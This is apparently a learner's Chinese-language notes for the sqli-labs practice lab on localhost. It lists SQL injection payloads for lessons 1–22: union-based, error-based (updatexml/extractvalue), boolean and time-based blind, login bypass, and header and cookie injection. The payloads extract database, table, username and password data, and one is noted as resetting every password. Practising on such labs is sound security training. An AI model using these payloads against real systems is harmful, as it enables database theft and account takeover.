T1 字符型 单引号闭合(union select注入)
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+
T2数字型(union select注入)
http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3
T3字符型 闭合: ('') (union select注入)
http://127.0.0.1/sqli-labs/Less-3/?id=1') --+
http://127.0.0.1/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+
T4字符型 闭合: ("") (union select注入)
http://127.0.0.1/sqli-labs/Less-4/?id=1") --+
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,3 --+
T5字符型 单引号闭合 布尔盲注/报错注入
http://127.0.0.1/sqli-labs/Less-5/?id=1' --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select database()='security') --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 100) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select table_name from information_schema.tables where table_schema='security' limit 0,1) --+
T6字符型 双引号闭合 报错注入/布尔盲注
http://127.0.0.1/sqli-labs/Less-6/?id=1" --+
http://127.0.0.1/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
T7
T8字符型 单引号闭合 布尔盲注
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select database()='security') --+
T9字符型 单引号闭合 时间盲注
127.0.0.1/sqli-labs/Less-9/?id=1' and sleep(5) --+ //经过尝试 只有单引号可以成功执行 所以是单引号闭合
127.0.0.1/sqli-labs/Less-9/?id=2' and if((select database())="security",sleep(5),null) --+
T10字符型 双引号闭合 时间盲注
127.0.0.1/sqli-labs/Less-10/?id=1" and sleep(5) --+
127.0.0.1/sqli-labs/Less-10/?id=2" and if((select database())="security",sleep(5),null) --+
T11 POST注入 union select注入 单引号闭合
username:
' order by 2 #
' union select 1,2 #
' union select 1,database() #
' union select 1,table_name from information_schema.tables where table_schema="security" limit 0,1 #
' union select 1,table_name from information_schema.tables where table_schema="security" limit 3,1 #
' union select 1,column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1 #
' union select username,password from users limit 0,1 #
T12 POST注入 union select注入 闭合方式: ("")
") order by 2 #
") union select 1,2 #
T13 POST注入 闭合方式('')union select没有回显 报错注入/盲注
') #
') union select 1,2 #
') and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e),1) #
T14 POST注入 闭合方式"" union select没有回显 报错注入/盲注
" #
" order by 2 #
" union select 1,2 #
" and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
" or updatexml(1,concat(0x7e,(select database()),0x7e),1) #
" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e),1) #
T15 POST注入 盲注 单引号闭合 方法2:构造万能密码
' or 1=1 # //四种组合中唯一成功的 说明闭合方式是单引号
' or updatexml(1,concat(0x7e,(select database()),0x7e),1) # //报错注入没有回显 则接下来用盲注方式
' or (select database()='security') #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>100) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>110) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))<105) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))<102) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=101) #
' or (select substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1) = 'e') #
' or '1'='1
T16 POST注入 盲注 方法2:构造万能密码
") or 1=1 #
") or (select database()='security') #
") or ("1")=("1
T17 POST注入 密码重置
username:adminpassword:' or 1=1 #//此时所有的密码都被重置成了1
T18 POST注入 HTTP头注入之User-Agent注入
User-Agent的测试不能用注释符号
测试发现闭合是单引号
' and '1'='1
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1
T19 POST注入 HTTP-Head之Referer注入
' and '1'='1
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1
T20 POST注入 Cookie注入
' #
' or extractvalue(1,concat(0x7e,(select database()),0x7e)) #
admin' and extractvalue(1,concat(0x7e,(select database()),0x7e)) #
' or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e)) #
' or extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) #
T21 POST注入 Cookie注入变形 闭合('')
(所有的内容都base64加密以后再提交即可)
\ XA==
') # JykgIw==
') or extractvalue(1,concat(0x7e,(select database()),0x7e)) # Jykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw==
admin') and extractvalue(1,concat(0x7e,(select database()),0x7e)) # YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw==
uname=') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) or ('1')=('1
T22 POST注入 Cookie注入变形 闭合 ""
(所有的内容都base64加密以后再提交即可)
\ XA==
" # IiAj
" or extractvalue(1,concat(0x7e,(select database()),0x7e)) # IiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSAj
admin" or extractvalue(1,concat(1,concat(0x7e,(select database()),0x7e),1)) # YWRtaW4iIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSksMSkpICM=
admin" and extractvalue(1,concat(0x7e,(select database()),0x7e)) and "1"="1 YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSBhbmQgIjEiPSIx